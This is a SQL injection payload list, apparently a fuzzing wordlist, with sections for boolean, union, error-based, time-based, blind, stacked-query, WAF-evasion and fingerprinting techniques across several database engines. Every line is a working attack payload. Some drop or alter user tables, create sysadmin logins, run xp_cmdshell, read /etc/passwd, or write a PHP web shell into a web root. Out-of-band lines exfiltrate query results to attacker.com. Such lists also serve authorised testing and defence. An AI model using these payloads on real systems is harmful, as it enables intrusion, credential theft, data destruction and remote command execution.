# Boolean-Based Payloads - Always True
' OR '1'='1
' AND 7677=7677 AND 'WvwV'='WvwV
' OR 1=1--
'or 1=1 or ''='1
1' OR '1'='1
' OR 'x'='x 
' OR 'a'='a  
') OR ('x'='x  
') OR ('a'='a  
") OR ("a"="a  
hi" OR "a"="a  
hi" OR 1=1--  
hi' OR 1=1--  
hi' OR 'a'='a  
hi') OR ('a'='a  
hi") OR ("a"="a  
' OR 'unusual'='unusual'  
' OR 'text' = N'text'  
' OR 'something' LIKE 'some%'  
' OR 2 > 1  
' OR 'whatever' IN ('whatever')  
' OR username LIKE CHAR(37)  

# Boolean-Based Payloads - Always False
' OR '1'='2  
' OR 1=2--  

# Time-Based / Delay Payloads
' OR SLEEP(5)--
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1
'; WAITFOR DELAY '0:0:5'--

# Union-Based Payloads
' UNION SELECT NULL--  
' UNION ALL SELECT NULL,NULL,CONCAT(CHAR(58,58),database(),CHAR(58,58)),NULL,NULL,NULL,NULL-- -  
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,58),user(),CHAR(58,58)),NULL,NULL,NULL,NULL,NULL,NULL-- -  
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,58),table_name,CHAR(58,58)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -  
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,58),column_name,CHAR(58,58)),NULL,NULL-- -  
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,58),table_name,CHAR(58,58)),NULL,NULL-- -  
' UNION ALL SELECT NULL,CONCAT(CHAR(58,58),database(),CHAR(58,58)),NULL-- -  
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -  
' UNION SELECT 1,2,3--  
' UNION ALL SELECT @@version--  
' UNION SELECT * FROM users WHERE login=CHAR(114,111,111,116)--  

# Error-Based Payloads
admin'--  
" OR 0=0--  
' OR 0=0#  
" OR 0=0#  
' AND (SELECT COUNT(*),CONCAT(CHAR(58,58),TABLE_NAME,CHAR(58,58)) FROM INFORMATION_SCHEMA.PLUGINS GROUP BY TABLE_NAME)--  
' AND 2002=(SELECT COUNT() FROM INFORMATION_SCHEMA.COLUMNS A, B, C WHERE 0 XOR 1)--  

# Command Execution Payloads (DANGEROUS - Lab Only)
'; EXEC master..xp_cmdshell 'ping 10.10.1.2'--  
EXEC sp_addlogin 'name', 'password'  
EXEC sp_addsrvrolemember 'name', 'sysadmin'  
'; DROP TABLE temp--

# Miscellaneous / SQL Tricks
' HAVING 1=1--  
' GROUP BY userid HAVING 1=1--  
admin' OR '  
' OR 'something'='some'+'thing'  
' AND 1 IN (SELECT var FROM temp)--  
' OR 2 BETWEEN 1 AND 3  
' OR 1 IN (SELECT @@version)--  
' AND 6642=6642 AND 'dHGN'='dHGN  
' AND 7677=7677 AND 'WvwV'='WvwV  
' AND 4095=4095 AND 'WyvE'='WyvE  
' AND 2830=2830 AND 'iciq'='iciq  
' AND 5804=5804 AND 'tyPj'='tyPj  
' OR NOT 7171=7171#  
CREATE USER name IDENTIFIED BY 'pass123';
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

# ========================
# BASIC/UNIVERSAL PAYLOADS
# ========================
'
"
`
')
")
`)
'))
"))
`))
'))--
"))--
`))--
'--
"--
`--
'/*
"/*
`/* 
';
";
`;

# ========================
# BOOLEAN-BASED PAYLOADS
# ========================
# Always True Conditions
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
' OR 'a'='a
' OR 'x'='x
' OR 'text'='text
' OR 'unusual'='unusual'
' OR 2 > 1
' OR 5 BETWEEN 1 AND 10
' OR 'something' LIKE 'some%'
' OR 'whatever' IN ('whatever')
' OR username LIKE '%'
' OR 1=1 LIMIT 1--
' OR 1=1 UNION SELECT 1--

# Always False Conditions
' AND 1=0
' OR '1'='2
' AND 'a'='b
' OR 1=2--
' OR 0=1#
' OR NOT 1=1

# Complex Boolean
' OR (SELECT COUNT(*) FROM users) > 0--
' OR (SELECT COUNT(*) FROM information_schema.tables) > 0--
' OR EXISTS(SELECT * FROM users)--
' OR (SELECT SUBSTRING(@@version,1,1))='5'
' OR ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects),1,1)) > 0

# ========================
# UNION-BASED PAYLOADS
# ========================
# Basic Union
' UNION SELECT NULL--
' UNION ALL SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--

# MySQL Union
' UNION SELECT @@version,NULL--
' UNION SELECT user(),database()--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT CONCAT(username,':',password),NULL FROM users--

# PostgreSQL Union
' UNION SELECT version(),NULL--
' UNION SELECT current_user,NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

# MSSQL Union
' UNION SELECT @@version,NULL--
' UNION SELECT user_name(),db_name()--
' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--
' UNION SELECT name,NULL FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')--

# Oracle Union
' UNION SELECT banner,NULL FROM v$version--
' UNION SELECT user,NULL FROM dual--
' UNION SELECT table_name,NULL FROM all_tables--
' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS'--

# SQLite Union
' UNION SELECT sqlite_version(),NULL--
' UNION SELECT name,NULL FROM sqlite_master WHERE type='table'--
' UNION SELECT sql,NULL FROM sqlite_master WHERE type='table' AND name='users'--

# Advanced Union
' UNION SELECT GROUP_CONCAT(table_name),NULL FROM information_schema.tables--
' UNION SELECT GROUP_CONCAT(column_name),NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT NULL,LOAD_FILE('/etc/passwd')--
' UNION SELECT NULL,@@datadir--

# ========================
# ERROR-BASED PAYLOADS
# ========================
# MySQL Error-Based
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))--
' AND UPDATEXML(1, CONCAT(0x7e, (SELECT user()), 0x7e), 1)--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

# PostgreSQL Error-Based
' AND CAST((SELECT version()) AS INTEGER)--
' AND 1=CAST((SELECT version()) AS INTEGER)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)--

# MSSQL Error-Based
' AND 1=CONVERT(INT, (SELECT @@version))--
' AND 1= (SELECT TOP 1 CAST(@@version AS INT))--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT @@version),CAST(FLOOR(RAND(0)*2) AS INT))x FROM sysobjects GROUP BY x)a)--

# Oracle Error-Based
' AND (SELECT CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual)) FROM dual) IS NOT NULL--
' AND (SELECT UTL_INADDR.GET_HOST_NAME((SELECT user FROM dual)) FROM dual) IS NOT NULL--

# Generic Error-Based
' AND (SELECT 1/0)--
' AND (SELECT * FROM non_existent_table)--

# ========================
# TIME-BASED/DELAY PAYLOADS
# ========================
# MySQL Time-Based
' AND SLEEP(5)--
' AND (SELECT SLEEP(5))--
' AND BENCHMARK(10000000,MD5(1))--

# PostgreSQL Time-Based
' AND (SELECT pg_sleep(5))--
' AND (SELECT 123 FROM PG_SLEEP(5))--

# MSSQL Time-Based
'; WAITFOR DELAY '0:0:5'--
' AND (SELECT COUNT(*) FROM sysobjects a, sysobjects b, sysobjects c, sysobjects d) > 0 WAITFOR DELAY '0:0:5'--

# Oracle Time-Based
' AND (SELECT COUNT(*) FROM all_users a, all_users b, all_users c, all_users d) > 0 AND DBMS_LOCK.SLEEP(5)=0--

# SQLite Time-Based
' AND (SELECT randomblob(1000000000))--

# Generic Time-Based
' AND (SELECT heavy_query())--  # Placeholder for database-specific heavy operations

# ========================
# STACKED QUERIES PAYLOADS
# ========================
# MySQL Stacked
'; DROP TABLE users; --
'; UPDATE users SET password='hacked' WHERE user='admin'; --
'; INSERT INTO users (username, password) VALUES ('hacker', 'pwned'); --

# MSSQL Stacked
'; EXEC xp_cmdshell 'dir'; --
'; EXEC sp_addlogin 'hacker', 'password'; --
'; EXEC sp_addsrvrolemember 'hacker', 'sysadmin'; --

# PostgreSQL Stacked
'; DROP TABLE users; --
'; CREATE TABLE hacked (data text); --
'; COPY hacked FROM '/etc/passwd'; --

# ========================
# OUT-OF-BAND PAYLOADS
# ========================
# DNS Exfiltration
' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT version()),'.attacker.com\\file.txt')))--
' UNION SELECT NULL,(SELECT version()) INTO OUTFILE '\\\\attacker.com\\share\\output.txt'--

# HTTP Exfiltration
' AND (SELECT MAKE_SET(1, (SELECT version())) WHERE 1=1 INTO OUTFILE 'http://attacker.com/collect.php?data=')--

# ========================
# SECOND-ORDER SQLI PAYLOADS
# ========================
admin' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
'; UPDATE products SET description = (SELECT password FROM users WHERE username='admin') WHERE id=1--

# ========================
# NO-SQL INJECTION PAYLOADS
# ========================
admin' || '1'=='1
admin' || 1==1//
{"$where": "this.username == 'admin' || this.password == '1' || '1'=='1'"}

# ========================
# BYPASS/WAF EVASION PAYLOADS
# ========================
# Case Variation
' Or '1'='1
' oR '1'='1
' OR '1'='1
' Or '1'='1'/*

# Comment Variation
'/**/OR/**/'1'='1
'/*!50000OR*/'1'='1
'/*!OR*/'1'='1

# Encoding
'%20OR%20'1'='1
'%0AOR%0A'1'='1
'%09OR%09'1'='1
'%0DOR%0D'1'='1
'%0COR%0C'1'='1
'%0BOR%0B'1'='1

# Double Encoding
'%2520OR%2520'1'='1
'%2550R%2520'1'='1

# Unicode
'%u0027%u004f%u0052%u0027%u0031%u003d%u0031

# Null Bytes
'%00OR%00'1'='1

# Concatenation
' OR '1'='1'
' OR '1'='1'||'1
' OR '1'='1'+'1

# Alternative Keywords
' || '1'='1
' && '1'='1
' XOR '1'='1

# Alternative Comparison
' OR 1 LIKE 1
' OR 1 REGEXP 1
' OR 1 RLIKE 1

# Time-Based Bypass
' OR IF(1=1,SLEEP(5),0)--
' OR CASE WHEN 1=1 THEN SLEEP(5) ELSE 0 END--

# ========================
# DATABASE-SPECIFIC PAYLOADS
# ========================
# MySQL Specific
' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1))a)--
' AND (SELECT @:=0x0,(SELECT @ FROM (SELECT @:=@+1,@)a))--

# PostgreSQL Specific
' AND (SELECT CASE WHEN (SELECT current_setting('is_superuser'))='on' THEN CAST(1/0 AS TEXT) ELSE 'a' END)='a'--

# MSSQL Specific
' AND (SELECT TOP 1 name FROM master..sysdatabases WHERE dbid=1)='master'--
' AND (SELECT TOP 1 name FROM sysobjects WHERE xtype='U')='users'--

# Oracle Specific
' AND (SELECT COUNT(*) FROM all_tables WHERE owner=SYS_CONTEXT('USERENV','CURRENT_USER'))>0--
' AND (SELECT INSTANCE_NAME FROM V$INSTANCE)='ORCL'--

# SQLite Specific
' AND (SELECT sql FROM sqlite_master) LIKE '%password%'--
' AND (SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name LIKE 'sqlite_%')=0--

# ========================
# ADVANCED/FUZZING PAYLOADS
# ========================
# JSON Injection
' AND JSON_EXTRACT('{"a":1}','$.a')=1--
' AND JSON_VALUE('{"a":1}','$.a')=1--

# XML Injection
' AND EXTRACTVALUE('<a><b>1</b></a>','/a/b')=1--
' AND XMLTYPE('<a><b>1</b></a>').EXTRACT('/a/b/text()').GETSTRINGVAL()=1--

# Regular Expression
' AND (SELECT 'abc' REGEXP 'a.*')=1--
' AND (SELECT 'abc' ~ 'a.*')=1--

# Math Functions
' AND (SELECT SIN(0))=0--
' AND (SELECT EXP(0))=1--

# String Functions
' AND (SELECT LENGTH('test'))=4--
' AND (SELECT REVERSE('abc'))='cba'--

# Date Functions
' AND (SELECT NOW())=NOW()--
' AND (SELECT GETDATE())=GETDATE()--

# System Functions
' AND (SELECT CURRENT_USER())=CURRENT_USER()--
' AND (SELECT DATABASE())=DATABASE()--

# ========================
# BLIND SQLI PAYLOADS
# ========================
# MySQL Blind
' AND (SELECT ASCII(SUBSTRING((SELECT user()),1,1)))=114--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin')))=32--

# PostgreSQL Blind
' AND (SELECT ASCII(SUBSTRING((SELECT user),1,1)))=114--
' AND (SELECT CHAR_LENGTH((SELECT password FROM users WHERE username='admin')))=32--

# MSSQL Blind
' AND (SELECT ASCII(SUBSTRING((SELECT USER_NAME()),1,1)))=115--
' AND (SELECT LEN((SELECT password FROM users WHERE username='admin')))=32--

# Oracle Blind
' AND (SELECT ASCII(SUBSTR((SELECT USER FROM DUAL),1,1)))=79--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin')) FROM DUAL)=32--

# ========================
# FILE OPERATION PAYLOADS
# ========================
# Read Files
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL--
' UNION SELECT pg_read_file('/etc/passwd'),NULL--
' UNION SELECT BulkColumn,NULL FROM OPENROWSET(BULK 'C:\boot.ini', SINGLE_BLOB) AS x--

# Write Files
' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT pg_write_file('/tmp/shell.php', '<?php system($_GET["cmd"]); ?>'),NULL--

# ========================
# PRIVILEGE ESCALATION PAYLOADS
# ========================
# MySQL Privilege
' AND (SELECT SUPER_PRIV FROM mysql.user WHERE user='root' AND host='localhost')='Y'--

# PostgreSQL Privilege
' AND (SELECT rolsuper FROM pg_roles WHERE rolname='postgres')=true--

# MSSQL Privilege
' AND (SELECT is_srvrolemember('sysadmin'))=1--

# Oracle Privilege
' AND (SELECT privilege FROM session_privs WHERE privilege='DBA')='DBA'--

# ========================
# DATABASE FINGERPRINTING
# ========================
# Version Detection
' AND @@version LIKE '%MySQL%'--
' AND version() LIKE '%PostgreSQL%'--
' AND @@version LIKE '%Microsoft SQL Server%'--
' AND (SELECT banner FROM v$version) LIKE '%Oracle%'--

# Function Detection
' AND (SELECT IFNULL(1,0))=1--
' AND (SELECT COALESCE(1,0))=1--
' AND (SELECT NVL(1,0))=1--

# Comment Detection
'/*MySQL*/ AND 1=1--
'-- PostgreSQL AND 1=1
';-- MSSQL AND 1=1